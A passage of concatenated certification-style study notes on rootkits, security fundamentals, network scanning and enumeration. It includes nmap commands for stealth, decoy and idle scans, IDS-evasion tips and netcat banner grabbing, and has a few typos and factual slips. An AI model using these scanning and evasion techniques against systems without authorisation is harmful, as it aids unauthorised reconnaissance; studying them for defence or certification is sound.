203 | - Software put in place by attacker to obscure system compromise
204 | - Hides processes and files
205 | - Also allows for future access
206 | - **Examples**
207 |   - Horsepill - Linus kernel rootkit inside initrd
208 |   - Grayfish - Windows rootkit that injects in boot record
209 |   - Firefef - multi-component family of malware
210 |   - Azazel
211 |   - Avatar
212 |   - Necurs
213 |   - ZeroAccess
214 | - **Hypervisor level** - rootkits that modify the boot sequence of a host system to load a VM as the host OS
215 | - **Hardware** - hide malware in devices or firmware
216 | - **Boot loader level** - replace boot loader with one controlled by hacker
217 | - **Application level** - directed to replace valid application files with Trojans
218 | - **Kernel level** - attack boot sectors and kernel level replacing kernel code with back-door code; most dangerous
219 | - **Library level** - use system-level calls to hide themselves
220 | - One way to detect rootkits is to map all the files on a system and then boot a system from a clean CD version and compare the two file systems


--------------------------------------------------------------------------------
/1 - Essential Knowledge.md:
--------------------------------------------------------------------------------
  1 | # Essential Knowledge
  2 | 
  3 | ### <u>The OSI Reference Model</u>
  4 | 
  5 | | Layer | Description  | Technologies    | Data Unit |
  6 | | ----- | ------------ | --------------- | --------- |
  7 | | 1     | Physical     | USB, Bluetooth  | Bit       |
  8 | | 2     | Data Link    | ARP, PPP        | Frame     |
  9 | | 3     | Network      | IP              | Packet    |
 10 | | 4     | Transport    | TCP             | Segment   |
 11 | | 5     | Session      | X255, SCP       | Data      |
 12 | | 6     | Presentation | AFP, MIME       | Data      |
 13 | | 7     | Application  | FTP, HTTP, SMTP | Data      |
 14 | 
 15 | ### <u>TCP/IP Model</u>
 16 | 
 17 | | Layer | Description    | OSI Layer Equivalent |
 18 | | ----- | -------------- | -------------------- |
 19 | | 1     | Network Access | 1, 2                 |
 20 | | 2     | Internet       | 3                    |
 21 | | 3     | Transport      | 4                    |
 22 | | 4     | Application    | 5-7                  |
 23 | 
 24 | ### <u>TCP Handshake</u>
 25 | 
 26 | SYN -> SYN-ACK -> ACK
 27 | 
 28 | ### <u>ARP</u>
 29 | 
 30 | - Resolves IP address to physical address
 31 | 
 32 | ### <u>Network Security Zones</u>
 33 | 
 34 | - **Internet** - uncontrollable
 35 | - **Internet DMZ** - controlled buffer network
 36 | - **Production Network Zone** - very restricted; controls direct access from uncontrolled zones; has no users
 37 | - **Intranet Zone** - controlled; has little to no heavy restrictions
 38 | - **Management Network Zone** - might find VLANs and IPSEC; highly secured; strict policies
 39 | 
 40 | ### <u>Vulnerabilities</u>
 41 | 
 42 | - **Common Vulnerability Scoring System** (CVSS) - places numerical score based on severity
 43 | - **National Vulnerability Database** (NVD) - US government repository of vulnerabilities
 44 | 
 45 | ### <u>Vulnerability Categories</u>
 46 | 
 47 | - **Misconfiguration** - improperly configuring a service or application
 48 | - **Default installation** - failure to change settings in an application that come by default
 49 | - **Buffer overflow** - code execution flaw
 50 | - **Missing patches** -  systems that have not been patched
 51 | - **Design flaws** - flaws inherent to system design such as encryption and data validation
 52 | - **Operating System Flaws** - flaws specific to each OS
 53 | - **Default passwords** - leaving default passwords that come with system/application
 54 | 
 55 | ### <u>Vulnerability Management Tools</u>
 56 | 
 57 | - Nessus
 58 | - Qualys
 59 | - GFI Languard
 60 | - Nikto
 61 | - OpenVAS
 62 | - Retina CS
 63 | 
 64 | ### <u>Terms to Know</u>
 65 | 
 66 | - **Hack value** - perceived value or worth of a target as seen by the attacker
 67 | - **Zero-day attack** - attack that occurs before a vendor knows or is able to patch a flaw
 68 | - **Doxing** - searching for and publishing information about an individual usually with a malicious intent
 69 | - **Enterprise Information Security Architecture** (EISA) - process that determines how systems work within an organization
 70 | - **Incident management** - deals with specific incidents to mitigate the attack
 71 | 
 72 | ### <u>Threat Modeling</u>
 73 | 
 74 | - Identify security objectives
 75 | - Application Overview
 76 | - Decompose application
 77 | - Identify threats
 78 | - Identify vulnerabilities
 79 | 
 80 | ### <u>Risk Management</u>
 81 | 
 82 | - Risk identification
 83 | - Risk assessment
 84 | - Risk treatment
 85 | - Risk tracking
 86 | - Risk review
 87 | 
 88 |   *Uses risk analysis matrix to determine threat level
 89 | 
 90 | ### <u>Types of  Security Controls</u>
 91 | 
 92 | | Description    | Examples                                      |
 93 | | -------------- | --------------------------------------------- |
 94 | | Physical       | Guards, lights, cameras                       |
 95 | | Technical      | Encryption, smart cards, access control lists |
 96 | | Administrative | Training awareness, policies                  |
 97 | 
 98 | | Description  | Examples                    |
 99 | | ------------ | --------------------------- |
100 | | Preventative | authentication, alarm bells |
101 | | Detective    | audits, backups             |
102 | | Corrective   | restore operations          |
103 | 
104 | ### <u>Business Analysis</u>
105 | 
106 | - Business Impact Analysis (BIA)
107 | 
108 |   - Maximum Tolerable Downtime (MTD)
109 | 
110 | - Business Continuity Plan (BCP)
111 | 
112 |   - Disaster Recovery Plan (DRP)
113 | 
114 | - Annualized Loss Expectancy (ALE)
115 | 
116 |   - Annual Rate of Occurrence (ARO)
117 | 
118 |   - Single Loss Expectancy (SLE)
119 |     $$
120 |     ALE = SLE * ARO
121 |     $$
122 | 
123 | **User Behavior Analysis** (UBA) - tracking users and extrapolating data in light of malicious activity
124 | 
125 | ### <u>CIA Triad</u>
126 | 
127 | - **Confidentiality** - passwords, encryption
128 | - **Integrity** - hashing, digital signatures
129 | - **Availability** - anti-dos solutions
130 | 
131 | **Bit flipping** is an example of an <u>integrity</u> attack.  The outcome is not to gain information - it is to obscure the data from the actual user.
132 | 
133 | Confidentiality != authentication - MAC address spoofing is an authentication attack
134 | 
135 | ### <u>Common Criterial for Information Technology Security Evaluation</u>
136 | 
137 | - Routinely called "Common Criteria" (CC)
138 | - **Evaluation Assurance Level** (EAL) - goes from level 1 - 7
139 | - **Target of Evaluation** - the system that is being tested
140 | - **Security Target** (ST) - document describing the TOE and security requirements
141 | - **Protection Profile** (PP) - security requirements that are specific to the type of device being tested
142 | 
143 | ### <u>Access Control Types</u>
144 | 
145 | - **Mandatory** (MAC) - access is set by an administrator
146 | - **Discretionary** (DAC) - allows users to give access to resources that they own and control
147 | 
148 | ### <u>Security Policies</u>
149 | 
150 | - **Access Control** - what resources are protected and who can access them
151 | - **Information Security** - what can systems be used for
152 | - **Information Protection** - defines data sensitivity levels
153 | - **Password** - all things about passwords (how long, characters required, etc.)
154 | - **E-Mail** - proper and allowable use of email systems
155 | - **Information Audit** - defines the framework used for auditing
156 | 
157 | ### <u>Policy Categorizations</u>
158 | 
159 | - **Promiscuous** - wide open
160 | - **Permissive** - blocks only known dangerous things
161 | - **Prudent** - blocks most and only allows things for business purposes
162 | - **Paranoid** - locks everything down
163 | 
164 | **Standards** - mandatory rules to achieve consistency
165 | 
166 | **Baselines** - provide the minimum security necessary
167 | 
168 | **Guidelines** - flexible or recommended actions
169 | 
170 | **Procedures** - step by step instructions
171 | 
172 | **Script Kiddie** - uneducated in security methods, but uses tools that are freely available to perform malicious activities
173 | 
174 | **Phreaker** - manipulates telephone systems
175 | 
176 | ### <u>The Hats</u>
177 | 
178 | - **White Hat** - ethical hackers
179 | - **Black Hat** - hackers that seek to perform malicious activities
180 | - **Gray Hat** - hackers that perform good or bad activities but do not have the permission of the organization they are hacking against
181 | 
182 | **Hacktivist** - someone who hacks for a cause
183 | 
184 | **Suicide Hackers** - do not case about any impunity to themselves; hack to get the job done
185 | 
186 | **Cyberterrorist** - motivated by religious or political beliefs to create fear or disruption
187 | 
188 | **State-Sponsored Hacker** - hacker that is hired by a government
189 | 
190 | ### <u>Attack Types</u>
191 | 
192 | - **Operating System** (OS) - attacks targeting OS flaws or security issues inside such as guest accounts or default passwords
193 | - **Application Level** - attacks on programming code and software logic
194 | - **Shrink-Wrap Code** - attack takes advantage of built-in code or scripts
195 | - **Misconfiguration** - attack takes advantage of systems that are misconfigured due to improper configuration or default configuration
196 | 
197 | **Infowar** - the use of offensive and defensive techniques to create an advantage
198 | 
199 | ### <u>Hacking Phases</u>
200 | 
201 | 1. **Reconnaissance**  - gathering evidence about targets
202 | 2. **Scanning & Enumeration** - obtaining more in-depth information about targets
203 | 3. **Gaining Access** - attacks are leveled in order to gain access to a system
204 | 4. **Maintaining Access** - items put in place to ensure future access
205 | 5. **Covering Tracks** - steps taken to conceal success and intrusion
206 | 
207 | ### <u>Types of Reconnaissance</u>
208 | 
209 | - **Passive** - gathering information about the target without their knowledge
210 | - **Active** - uses tools and techniques that may or may not be discovered
211 | 
212 | ### <u>Security Incident and Event Management (SIEM)</u>
213 | 
214 | - Functions related to a security operations center (SOC)
215 |   - Identifying
216 |   - Monitoring
217 |   - Recording
218 |   - Auditing
219 |   - Analyzing
220 | 
221 | **Ethical hacker** - employs tools that hackers use with a customer's permission; always obtains an agreement from the client with specific objectives <u>before</u> any testing is done
222 | 
223 | **Cracker** - uses tools for personal gain or destructive purposes
224 | 
225 | ### <u>Penetration Test</u>
226 | 
227 | - Clearly defined, full scale test of security controls
228 | - Phases
229 |   - **Preparation** - contracts and team determined
230 |   - **Assessment** - all hacking phases (reconnaissance, scanning, attacks, etc.)
231 |   - **Post-Assessment** - reports & conclusions
232 | - Types
233 |   - **Black Box** - done without any knowledge of the system or network
234 |   - **White Box** - complete knowledge of the system
235 |   - **Gray Box** - has some knowledge of the system and/or network
236 | 
237 | ### <u>Law Categories</u>
238 | 
239 | - **Criminal** - laws that protect public safety and usually have jail time attached
240 | - **Civil** - private rights and remedies
241 | - **Common** - laws that are based on societal customs
242 | 
243 | 
244 | ### <u>Laws and Standards</u>
245 | 
246 | - **OSSTM Compliance** - "Open Source Security Testing Methodology Manual" maintained by ISECOM , defines three types of compliance
247 |   - **Legislative** - Deals with government regulations (Such as SOX and HIPAA)
248 |   - **Contractual** - Deals with industry / group requirement (Such as PCI DSS)
249 |   - **Standards based** - Deals with practices that must be followed by members of a given group/organization (Such as ITIL ,ISO and OSSTMM itself)
250 |   
251 | - **OSSTM Controls**
252 |   - **OSSTM Class A - Interactive Controls**
253 |     - *Authentication* -  Provides for identification and authorization based on credentials 
254 |     - *Indemnification* - Provided contractual protection against loss or damages
255 |     - *Subjugation* - Ensures that interactions occur according to processes defined by the asset owner
256 |     - *Continuity* -  Maintains interactivity with assets if corruption of failure occurs
257 |     - *Resilience* - Protects assets from corruption and failure
258 |    
259 |   
260 |   
261 |   - **OSSTM Class B  - Process Controls**
262 |       - *Non-repudiation* - Prevents participants from denying its actions
263 |       - *Confidentiality* - Ensures that only participants know of an asset
264 |       - *Privacy* - Ensures that only participants have access to the asset
265 |       - *Integrity* - Ensures that only participants know when assets and processes change
266 |       - *Alarm*  - Notifies participants when interactions occur
267 |       
268 | - **ISO 27001** - Security standard based on the British BS7799 standard, focuses on security governance
269 | 
270 | - **NIST-800-53** -  Catalogs security and privacy controls for federal information systems, created to help implementation of FISMA
271 | 
272 | - **ISO 27002 AND 17799** - Based on BS799 but focuses on security objectives and provides security controls based on industry best practice
273 | 
274 | - **FISMA** - "Federal Information Security Modernization Ac Of 2002" A law updated in 2004 to codify the authority of the Department of Homeland Security with regard to implementation of information security policies 
275 |   
276 | - **FITARA** - "Federal Information Technology Acquisition Reform Act" A 2013 bill that was intended to change the framework that determines how the US GOV purchases technology 
277 | 
278 | - **HIPAA** - "Health Insurance Portability and Accountability Act" a law that set's privacy standards to protect patient medical records and health information shared between doctors, hospitals and insurance providers
279 | 
280 | - **PCI-DSS**  - "Payment Card Industry Data Security Standard" Standard for organizations handling Credit Cards, ATM cards and other POS cards
281 | 
282 | - **COBIT** - "Control Object for Information and Related Technology" IT Governance framework and toolset, created by ISACA and ITGI
283 | 
284 | - **SOX** - "Sarbanes-Oxley Act" Law that requires publicly traded companies to submit to independent audits and to properly disclose financial information
285 | 
286 | - **GLBA** - "U.S Gramm-Leach-Bliley Act" Law that protects the confidentiality and integrity of personal information that is collected by financial institutions.
287 | 
288 | - **CSIRT** - "Computer Security Incident Response Team" CSIRT provided a single point of contact when reporting computer security incidents
289 | 
290 | - **ITIL** - "Information Technology Infrastructure Library" - An operational framework developed in the '80s that standardizes IT management procedures 
291 | 
292 | ### <u>Controls</u>
293 | 
294 | - **Directive** - Also known as procedural controls because they deal with company procedures such as security policies, operations plans, and guidelines. 
295 | - **Deterrent** - Controls that are used to dissuade potential attackers, such as signs that warn possible attackers about the alarm system and monitoring in place.
296 | - **Preventive**  - Controls used to stop potential attacks by preventing users from performing specific actions, such as encryption and authentication
297 | - **Compensating** - Controls used to supplement directive controls, such as administrator reviewing logs files for violations of company policy
298 | - **Detective** -  Controls used to monitor and alert on malicious or unauthorized activity, such as IDS's and CCTV feeds monitored in real life
299 | - **Corrective** - Controls used to repair damage caused by malicious events. Such as AntiVirus software and IPS (IPS being both a detective and corrective control) 
300 | - **Recovery**
301 | 


--------------------------------------------------------------------------------
/3 - Scanning and Enumeration.md:
--------------------------------------------------------------------------------
  1 | # Scanning and Enumeration
  2 | 
  3 | **Scanning** - discovering systems on the network and looking at what ports are open as well as applications that may be running
  4 | 
  5 | **Connectionless Communication** - UDP packets are sent without creating a connection.  Examples are TFTP, DNS (lookups only) and DHCP
  6 | 
  7 | **Connection-Oriented Communication** - TCP packets require a connection due to the size of the data being transmitted and to ensure deliverability
  8 | 
  9 | ### <u>TCP Flags</u>
 10 | 
 11 | | Flag | Name           | Function                                                     |
 12 | | ---- | -------------- | ------------------------------------------------------------ |
 13 | | SYN  | Synchronize    | Set during initial communication.  Negotiating of parameters and sequence numbers |
 14 | | ACK  | Acknowledgment | Set as an acknowledgement to the SYN flag.  Always set after initial SYN |
 15 | | RST  | Reset          | Forces the termination of a connection (in both directions)  |
 16 | | FIN  | Finish         | Ordered close to communications                              |
 17 | | PSH  | Push           | Forces the delivery of data without concern for buffering    |
 18 | | URG  | Urgent         | Data inside is being sent out of band.  Example is cancelling a message |
 19 | 
 20 | ### <u>TCP Handshake</u>
 21 | 
 22 | - SYN -> SYN-ACK - ACK
 23 | - Sequence numbers increase on new communication.  Example is computers A and B.  A would increment B's sequence number.  A would never increment it's own sequence.
 24 | 
 25 | ### <u>Port Numbers</u>
 26 | 
 27 | - **Internet Assigned Numbers Authority** (IANA) - maintains Service Name and Transport Protocol Port Number Registry which lists all port number reservations
 28 | 
 29 | - Ranges
 30 | 
 31 |   - **Well-known ports** - 0 - 1023
 32 | 
 33 |   - **Registered ports** - 1024 - 49,151
 34 | 
 35 |   - **Dynamic ports** - 49,152 - 65,535
 36 | 
 37 |     | Port Number | Protocol | Transport Protocol |
 38 |     | ----------- | -------- | ------------------ |
 39 |     | 20/21       | FTP      | TCP                |
 40 |     | 22          | SSH      | TCP                |
 41 |     | 23          | Telnet   | TCP                |
 42 |     | 25          | SMTP     | TCP                |
 43 |     | 53          | DNS      | TCP/UDP            |
 44 |     | 67          | DHCP     | UDP                |
 45 |     | 69          | TFTP     | UDP                |
 46 |     | 80          | HTTP     | TCP                |
 47 |     | 110         | POP3     | TCP                |
 48 |     | 135         | RPC      | TCP                |
 49 |     | 137-139     | NetBIOS  | TCP/UDP            |
 50 |     | 143         | IMAP     | TCP                |
 51 |     | 161/162     | SNMP     | UDP                |
 52 |     | 389         | LDAP     | TCP/UDP            |
 53 |     | 443         | HTTPS    | TCP                |
 54 |     | 445         | SMB      | TCP                |
 55 |     | 514         | SYSLOG   | UDP                |
 56 | 
 57 |   - A service is said to be **listening** for a port when it has that specific port open
 58 | 
 59 |   - Once a service has made a connection, the port is in an **established** state
 60 | 
 61 |   - Netstat
 62 | 
 63 |     - Shows open ports on computer
 64 |     - **netstat -an** displays connections in numerical form
 65 |     - **netstat -b** displays executables tied to the open port (admin only)
 66 | 
 67 | ### <u>Subnetting</u>
 68 | 
 69 | - **IPv4 Main Address Types**
 70 |   - **Unicast** - acted on by a single recipient
 71 |   - **Multicast** - acted on by members of a specific group
 72 |   - **Broadcast** - acted on by everyone on the network
 73 |     - **Limited** - delivered to every system in the domain (255.255.255.255)
 74 |     - **Directed** - delivered to all devices on a subnet and use that broadcast address
 75 | - **Subnet mask** - determines how many address available on a specific subnet
 76 |   - Represented by three methods
 77 |     - **Decimal** - 255.240.0.0
 78 |     - **Binary** - 11111111.11110000.00000000.00000000
 79 |     - **CIDR** - x.x.x.x/12   (where x.x.x.x is an ip address on that range)
 80 |   - If all the bits in the host field are 1s, the address is the broadcast
 81 |   - If they are all 0s, it's the network address
 82 |   - Any other combination indicates an address in the range
 83 |   - ![img](https://s3.amazonaws.com/prealliance-thumbnails.oneclass.com/thumbnails/001/751/775/original/stringio.txt?1513221790)
 84 | 
 85 | ### <u>Scanning Methodology</u>
 86 | 
 87 | - **Check for live systems** - ping or other type of way to determine live hosts
 88 | - **Check for open ports** - once you know live host IPs, scan them for listening ports
 89 | - **Scan beyond IDS** - if needed, use methods to scan  beyond the detection systems
 90 | - **Perform banner grabbing** - grab from servers as well as perform OS fingerprinting
 91 | - **Scan for vulnerabilities** - use tools to look at the vulnerabilities of open systems
 92 | - **Draw network diagrams** - shows logical and physical pathways into networks
 93 | - **Prepare proxies** - obscures efforts to keep you hidden
 94 | 
 95 | ### <u>Identifying Targets</u>
 96 | 
 97 | - The easiest way to scan for live systems is through ICMP.
 98 | 
 99 | - It has it's shortcomings and is sometimes blocked on hosts that are actually live.
100 | 
101 | - **Message Types and Returns**
102 | 
103 |   | ICMP Message Type           | Description and Codes                                        |
104 |   | --------------------------- | ------------------------------------------------------------ |
105 |   | 0:  Echo Reply              | Answer to a Type 8 Echo Request                              |
106 |   | 3:  Destination Unreachable | Error message followed by these codes:<br />0 - Destination network unreachable<br />1 - Destination host unreachable<br />6 - Network unknown<br />7 - Host unknown<br />9 - Network administratively prohibited<br />10 - Host administratively prohibited<br />13 - Communication administratively prohibited |
107 |   | 4: Source Quench            | A congestion control message                                 |
108 |   | 5: Redirect                 | Sent when there are two or more gateways available for the sender to use.  Followed by these codes:<br />0 - Redirect datagram for the network<br />1 - Redirect datagram for the host |
109 |   | 8:  Echo Request            | A ping message, requesting an echo reply                     |
110 |   | 11:  Time Exceeded          | Packet took too long to be routed (code 0 is TTL expired)    |
111 | 
112 |   - Payload of an ICMP message can be anything; RFC never set what it was supposed to be.  Allows for covert channels
113 |   - **Ping sweep** - easiest method to identify hosts
114 |   - **ICMP Echo scanning** - sending an ICMP Echo Request to the network IP address
115 |   - An ICMP return of type 3 with a code of 13 indicates a poorly configured firewall
116 |   - **Ping scanning tools**
117 |     - Nmap
118 |     - Angry IP Scanner
119 |     - Solar-Winds Engineer Toolkit
120 |     - Advanced IP Scanner
121 |     - Pinkie
122 |   - Nmap virtually always does a ping sweep with scans unless you turn it off
123 | 
124 | ### <u>Port Scan Types</u>
125 | 
126 | - **Full connect** - TCP connect or full open scan - full connection and then tears down with RST
127 |   - Easiest to detect, but most reliable
128 |   - nmap -sT
129 | - **Stealth** - half-open scan or SYN scan - only SYN packets sent.  Responses same as full.
130 |   - Useful for hiding efforts and evading firewalls
131 |   - nmap -sS
132 | - **Inverse TCP flag** - uses FIN, URG or PSH flag.  Open gives no response.  Closed gives RST/ACK
133 |   - nmap -sN (Null scan)
134 |   - nmap -sF (FIN scan)
135 | - **Xmas** - so named because all flags are turned on so it's "lit up" like a Christmas tree
136 |   - Responses are same as Inverse TCP scan
137 |   - Do not work against Windows machines
138 |   - nmap -sX
139 | - **ACK flag probe** - multiple methods
140 |   - TTL version - if TTL of RST packet < 64, port is open
141 |   - Window version - if the Window on the RST packet is anything other than 0, port open
142 |   - Can be used to check filtering.  If ACK is sent and no response, stateful firewall present.
143 |   - nmap -sA (ACK scan)
144 |   - nmap -sW (Window scan)
145 | - **IDLE Scan** - uses a third party to check if a port is open
146 |   - Looks at the IPID to see if there is a response
147 |   - Only works if third party isn't transmitting data
148 |   - Sends a request to the third party to check IPID id; then sends a spoofed packet to the target with a return of the third party; sends a request to the third party again to check if IPID increased.
149 |     - IPID increase of 1 indicates port closed
150 |     - IPID increase of 2 indicates port open
151 |     - IPID increase of anything greater indicates the third party was not idle
152 |   - nmap -sI <zombie host>
153 | 
154 | ### <u>Nmap Switches</u>
155 | 
156 | | Switch          | Description                                                  |
157 | | --------------- | ------------------------------------------------------------ |
158 | | -sA             | ACK scan                                                     |
159 | | -sF             | FIN scan                                                     |
160 | | -sI             | IDLE scan                                                    |
161 | | -sL             | DNS scan (list scan)                                         |
162 | | -sN             | NULL scan                                                    |
163 | | -sO             | Protocol scan (tests which IP protocols respond)             |
164 | | -sP             | Ping scan                                                    |
165 | | -sR             | RPC scan                                                     |
166 | | -sS             | SYN scan                                                     |
167 | | -sT             | TCP connect scan                                             |
168 | | -sW             | Window scan                                                  |
169 | | -sX             | XMAS scan                                                    |
170 | | -A              | OS detection, version detection, script scanning and traceroute |
171 | | -PI             | ICMP ping                                                    |
172 | | -Po             | No ping                                                      |
173 | | -PS             | SYN ping                                                     |
174 | | -PT             | TCP ping                                                     |
175 | | -oN             | Normal output                                                |
176 | | -oX             | XML output                                                   |
177 | | -T0 through -T2 | Serial scans.  T0 is slowest                                 |
178 | | -T3 through -T5 | Parallel scans.  T3 is slowest                               |
179 | 
180 | - Nmap runs by default at a T3 level
181 | - **Fingerprinting** - another word for port sweeping and enumeration
182 | 
183 | ### <u>Hping</u>
184 | 
185 | - Another powerful ping sweep and port scanning tool
186 | - Also can craft packets
187 | - hping3 -1 IPaddress
188 | 
189 | | Switch  | Description                                                  |
190 | | ------- | ------------------------------------------------------------ |
191 | | -1      | Sets ICMP mode                                               |
192 | | -2      | Sets UDP mode                                                |
193 | | -8      | Sets scan mode.  Expects port range without -p flag          |
194 | | -9      | Listen mode.  Expects signature (e.g. HTTP) and interface (-I eth0) |
195 | | --flood | Sends packets as fast as possible without showing incoming replies |
196 | | -Q      | Collects sequence numbers generated by the host              |
197 | | -p      | Sets port number                                             |
198 | | -F      | Sets the FIN flag                                            |
199 | | -S      | Sets the SYN flag                                            |
200 | | -R      | Sets the RST flag                                            |
201 | | -P      | Sets the PSH flag                                            |
202 | | -A      | Sets the ACK flag                                            |
203 | | -U      | Sets the URG flag                                            |
204 | | -X      | Sets the XMAS scan flags                                     |
205 | 
206 | ### <u>Evasion</u>
207 | 
208 | - To evade IDS, sometimes you need to change the way you scan
209 | - One method is to fragment packets (nmap -f switch)
210 | - **OS Fingerprinting**
211 |   - **Active**  - sending crafted packets to the target
212 |   - **Passive** - sniffing network traffic for things such as TTL windows, DF flags and ToS fields
213 | - **Spoofing** - can only be used when you don't expect a response back to your machine
214 | - **Source routing** - specifies the path a packet should take on the network; most systems don't allow this anymore
215 | - **IP Address Decoy** - sends packets from your IP as well as multiple other decoys to confuse the IDS/Firewall as to where the attack is really coming from
216 |   - nmap -D RND:10 x.x.x.x
217 |   - nmap -D decoyIP1,decoyIP2....,sourceIP,.... [target]
218 | - **Proxy** - hides true identity by filtering through another computer.  Also can be used for other purposes such as content blocking evasion, etc.
219 |   - **Proxy chains** - chaining multiple proxies together
220 |     - Proxy Switcher
221 |     - Proxy Workbench
222 |     - ProxyChains
223 | - **Tor** - a specific type of proxy that uses multiple hops to a destination; endpoints are peer computers
224 | - **Anonymizers** - hides identity on HTTP traffic (port 80)
225 | 
226 | ### <u>Vulnerability Scanning</u>
227 | 
228 | - Can be complex or simple tools run against a target to determine vulnerabilities
229 | - Industry standard is Tenable's Nessus
230 | - Other options include
231 |   - GFI LanGuard
232 |   - Qualys
233 |   - FreeScan - best known for testing websites and applications
234 |   - OpenVAS - best competitor to Nessus and is free
235 | 
236 | ### <u>Enumeration</u>
237 | 
238 | - Defined as listing the items that are found within a specific target
239 | - Always is active in nature
240 | 
241 | ### <u>Windows System Basics</u>
242 | 
243 | - Everything runs within context of an account
244 | - **Security Context** - user identity and authentication information
245 | - **Security Identifier** (SID) - identifies a user, group or computer account
246 | - **Resource Identifier** (RID) - portion of the SID identifying a specific user, group or computer
247 | - The end  of the SID indicates the user number
248 |   - Example SID:  S-1-5-21-3874928736-367528774-1298337465-**500**
249 |   - **Administrator Account** - SID of 500
250 |   - **Regular Accounts** - start with a SID of 1000
251 |   - **Linux Systems** used user IDs (UID) and group IDs (GID).  Found in /etc/passwd
252 | - **SAM Database** - file where all local passwords are stored (encrypted)
253 |   - Stored in C:\Windows\System32\Config
254 | - **Linux Enumeration Commands**
255 |   - **finger** - info on user and host machine
256 |   - **rpcinfo and rpcclient** - info on RPC in the environment
257 |   - **showmount** - displays all shared directories on the machine
258 | 
259 | ### <u>Banner Grabbing</u>
260 | 
261 | - **Active** - sending specially crafted packets and comparing responses to determine OS
262 | - **Passive** - reading error messages, sniffing traffic or looking at page extensions
263 | - Easy way to banner grab is connect via telnet on port (e.g. 80 for web server)
264 | - **Netcat** can also be used to banner grab
265 |   - nc <IPaddress or FQDN> <port number>
266 | - Can be used to get information about OS or specific server info (such as web server, mail server, etc.)
267 | 
268 | ### <u>NetBIOS Enumeration</u>
269 | 
270 | - NetBIOS provides name servicing, connectionless communication and some Session layer stuff
271 | - The browser service in Windows designed to host information about all machines within domain or TCP/IP network segment
272 | - NetBIOS name is a **16-character ASCII string** used to identify devices
273 | - Command on Windows is **nbtstat**
274 |   - nbtstat (gives your own info)
275 |   - nbtstat -n (gives local table)
276 |   - nbtstat -A IPADDRESS (gives remote information)
277 |   - nbtstat -c (gives cache information)
278 | 
279 | | Code | Type   | Meaning                   |
280 | | ---- | ------ | ------------------------- |
281 | | <1B> | UNIQUE | Domain master browser     |
282 | | <1C> | UNIQUE | Domain controller         |
283 | | <1D> | GROUP  | Master browser for subnet |
284 | | <00> | UNIQUE | Hostname                  |
285 | | <00> | GROUP  | Domain name               |
286 | | <03> | UNIQUE | Service running on system |
287 | | <20> | UNIQUE | Server service running    |
288 | 
289 | - NetBIOS name resolution doesn't work on IPv6
290 | - **Other Tools**
291 |   - SuperScan
292 |   - Hyena
293 |   - NetBIOS Enumerator
294 |   - NSAuditor
295 | 
296 | ### <u>SNMP Enumeration</u>
297 | 
298 | - **Management Information Base** (MIB) - database that stores information
299 | - **Object Identifiers** (OID) - identifiers for information stored in MIB
300 | - **SNMP GET** - gets information about the system
301 | - **SNMP SET** - sets information about the system
302 | - **Types of objects**
303 |   - **Scalar** - single object
304 |   - **Tabular** - multiple related objects that can be grouped together
305 | - SNMP uses community strings which function as passwords
306 | - There is a read-only and a read-write version
307 | - Default read-only string is **public** and default read-write is **private**
308 | - These are sent in cleartext unless using SNMP v3
309 | - **Tools**
310 |   - Engineer's Toolset
311 |   - SNMPScanner
312 |   - OpUtils 5
313 |   - SNScan
314 | 
315 | ### <u>Other Enumerations</u>
316 | 
317 | - **LDAP**
318 |   - Connects on 389 to a Directory System Agent (DSA)
319 |   - Returns information such as valid user names, domain information, addresses, telephone numbers, system data, organization structure and other items
320 |   - **Tools**
321 |     - Softerra
322 |     - JXplorer
323 |     - Lex
324 |     - LDAP Admin Tool
325 | - **NTP**
326 |   - Runs on UDP 123
327 |   - Querying can give you list of systems connected to the server (name and IP)
328 |   - **Tools**
329 |     - NTP Server Scanner
330 |     - AtomSync
331 |     - Can also use Nmap and Wireshark
332 |   - **Commands** include ntptrace, ntpdc and ntpq
333 | - **SMTP**
334 |   - VRFY - validates user
335 |   - EXPN - provides actual delivery address of mailing list and aliases
336 |   - RCPT TO - defines recipients


--------------------------------------------------------------------------------